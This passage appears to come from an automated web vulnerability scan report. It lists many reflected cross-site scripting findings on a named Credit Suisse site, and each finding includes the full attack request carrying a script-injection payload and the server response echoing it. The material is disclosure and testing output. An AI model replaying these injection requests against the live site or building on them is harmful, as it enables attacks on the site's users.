<a href="https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticleacfdd"><script>alert(1)</script>f2f9b8c78ed&amp;aoid=319249&amp;coid=64291&amp;lang=EN&amp;bhjs=-1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.9. https://infocus.credit-suisse.com/app/article/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e10a"><script>alert(1)</script>99d7fef3633 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/article/index.cfm?fuseaction=OpenArticle5e10a"><script>alert(1)</script>99d7fef3633&aoid=319037&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:37:11 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:12 GMT
expires: Mon, 19 Sep 2011 15:37:12 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle5e10a"><script>alert(1)</script>99d7fef3633&amp;aoid=319037&amp;lang=EN#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.10. https://infocus.credit-suisse.com/app/article/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90d80"><script>alert(1)</script>9a5107d00c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=319249&coid=64291&lang=EN&bhjs=-1&90d80"><script>alert(1)</script>9a5107d00c=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:43:15 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:43:15 GMT
expires: Mon, 19 Sep 2011 15:43:15 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&amp;aoid=319249&amp;coid=64291&amp;lang=EN&amp;bhjs=-1&amp;90d80"><script>alert(1)</script>9a5107d00c=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.11. https://infocus.credit-suisse.com/app/article/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 380be"><script>alert(1)</script>df475eb50b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=319037&lang=EN&380be"><script>alert(1)</script>df475eb50b7=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:27 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:27 GMT
expires: Mon, 19 Sep 2011 15:38:27 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&amp;aoid=319037&amp;lang=EN&amp;380be"><script>alert(1)</script>df475eb50b7=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.12. https://infocus.credit-suisse.com/app/error/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/error/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17d26"><script>alert(1)</script>65623ea9f39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/error/?17d26"><script>alert(1)</script>65623ea9f39=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:37:15 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:16 GMT
expires: Mon, 19 Sep 2011 15:37:16 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/error/index.cfm?17d26"><script>alert(1)</script>65623ea9f39=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.13. https://infocus.credit-suisse.com/app/error/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/error/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1dbd"><script>alert(1)</script>b957a32b292 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/error/index.cfm?a1dbd"><script>alert(1)</script>b957a32b292=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:40:35 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:40:35 GMT
expires: Mon, 19 Sep 2011 15:40:35 GMT
Content-Language: it-CH
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/error/index.cfm?a1dbd"><script>alert(1)</script>b957a32b292=1#MID" title="Direttamente al contenuto" accesskey="1">
...[SNIP]...

1.14. https://infocus.credit-suisse.com/app/legal/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/legal/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a300a"><script>alert(1)</script>3b65ae513c3 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/legal/index.cfm?fuseaction=LegalChecka300a"><script>alert(1)</script>3b65ae513c3&page=%2Findex%2Ecfm%3Ffuseaction%3DOpenTopic%26coid%3D90%26lang%3DEN&country=XY HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:49:48 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:49:48 GMT
expires: Mon, 19 Sep 2011 15:49:48 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/legal/index.cfm?fuseaction=LegalChecka300a"><script>alert(1)</script>3b65ae513c3&amp;page=%2Findex%2Ecfm%3Ffuseaction%3DOpenTopic%26coid%3D90%26lang%3DEN&amp;country=XY#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.15. https://infocus.credit-suisse.com/app/legal/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/legal/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14abf"><script>alert(1)</script>3883bfe567f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/legal/index.cfm?14abf"><script>alert(1)</script>3883bfe567f=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:48:05 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:48:06 GMT
expires: Mon, 19 Sep 2011 15:48:06 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/legal/index.cfm?14abf"><script>alert(1)</script>3883bfe567f=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.16. https://infocus.credit-suisse.com/app/newsletter/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/newsletter/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5413d"><script>alert(1)</script>605af0fd5aa was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/newsletter/index.cfm?fuseaction=OpenNewsletter5413d"><script>alert(1)</script>605af0fd5aa&coid=127170&ngoid=54001&lang=&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:42:36 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:42:37 GMT
expires: Mon, 19 Sep 2011 15:42:37 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/newsletter/index.cfm?fuseaction=OpenNewsletter5413d"><script>alert(1)</script>605af0fd5aa&amp;coid=127170&amp;ngoid=54001&amp;lang=&amp;l#MID" title="Direttamente al contenuto" accesskey="1">
...[SNIP]...

1.17. https://infocus.credit-suisse.com/app/newsletter/index.cfm [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/newsletter/index.cfm

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ce6"><script>alert(1)</script>7b4810b606f was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/newsletter/index.cfm?fuseaction=OpenNewsletter&coid=127170&ngoid=54001&lang=&lang=ENc4ce6"><script>alert(1)</script>7b4810b606f HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:43:53 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:43:53 GMT
expires: Mon, 19 Sep 2011 15:43:53 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/newsletter/index.cfm?fuseaction=OpenNewsletter&amp;coid=127170&amp;ngoid=54001&amp;lang=&amp;lc4ce6"><script>alert(1)</script>7b4810b606f#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.18. https://infocus.credit-suisse.com/app/newsletter/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/newsletter/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca3b6"><script>alert(1)</script>0bb47c3bc07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/newsletter/index.cfm?fuseaction=OpenNewsletter&coid=127170&ngoid=54001&lang=&lang=EN&ca3b6"><script>alert(1)</script>0bb47c3bc07=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:44:01 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:44:01 GMT
expires: Mon, 19 Sep 2011 15:44:01 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/newsletter/index.cfm?fuseaction=OpenNewsletter&amp;coid=127170&amp;ngoid=54001&amp;lang=&amp;l&amp;ca3b6"><script>alert(1)</script>0bb47c3bc07=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.19. https://infocus.credit-suisse.com/app/newsletter/index.cfm [ngoid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/newsletter/index.cfm

Issue detail

The value of the ngoid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8c7"><script>alert(1)</script>831595fee0f was submitted in the ngoid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/newsletter/index.cfm?fuseaction=OpenNewsletter&coid=127170&ngoid=540015c8c7"><script>alert(1)</script>831595fee0f&lang=&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:43:45 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:43:45 GMT
expires: Mon, 19 Sep 2011 15:43:45 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/newsletter/index.cfm?fuseaction=OpenNewsletter&amp;coid=127170&amp;ngoid=540015c8c7"><script>alert(1)</script>831595fee0f&amp;lang=&amp;l#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.20. https://infocus.credit-suisse.com/app/print/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/print/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aa38"><script>alert(1)</script>1c1918c8e5b was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/print/index.cfm?fuseaction=OpenTopic3aa38"><script>alert(1)</script>1c1918c8e5b&coid=90&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:49:18 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
pragma: no-cache
Last-Modified: Mon, 19 Sep 2011 14:49:18 GMT
expires: {ts '2011-09-19 16:49:19'}
Content-Language: en-US
Cache-Control: no-cache, no-store, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/print/index.cfm?fuseaction=OpenTopic3aa38"><script>alert(1)</script>1c1918c8e5b&amp;coid=90&amp;lang=EN#MID" title="Direttamente al contenuto" accesskey="1">
...[SNIP]...

1.21. https://infocus.credit-suisse.com/app/print/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/print/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afdf"><script>alert(1)</script>45fd9e7e039 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/print/index.cfm?fuseaction=OpenTopic&coid=90&lang=EN&4afdf"><script>alert(1)</script>45fd9e7e039=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:49:34 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
pragma: no-cache
Last-Modified: Mon, 19 Sep 2011 14:49:34 GMT
expires: {ts '2011-09-19 16:49:35'}
Content-Language: en-US
Cache-Control: no-cache, no-store, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/print/index.cfm?fuseaction=OpenTopic&amp;coid=90&amp;lang=EN&amp;4afdf"><script>alert(1)</script>45fd9e7e039=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.22. https://infocus.credit-suisse.com/app/rss/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/rss/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3057a"><script>alert(1)</script>fafe4cb6c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/rss/?3057a"><script>alert(1)</script>fafe4cb6c19=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:40:32 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:40:32 GMT
expires: Mon, 19 Sep 2011 15:40:32 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/rss/index.cfm?3057a"><script>alert(1)</script>fafe4cb6c19=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.23. https://infocus.credit-suisse.com/app/rss/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/rss/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 477f7"><script>alert(1)</script>1ce7d2f745 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/rss/index.cfm?fuseaction=OpenRSS477f7"><script>alert(1)</script>1ce7d2f745&aoid=319249&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:49:36 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:49:36 GMT
expires: Mon, 19 Sep 2011 15:49:36 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/rss/index.cfm?fuseaction=OpenRSS477f7"><script>alert(1)</script>1ce7d2f745&amp;aoid=319249&amp;lang=EN#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.24. https://infocus.credit-suisse.com/app/rss/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/rss/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbfe3"><script>alert(1)</script>809e200f8c1 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

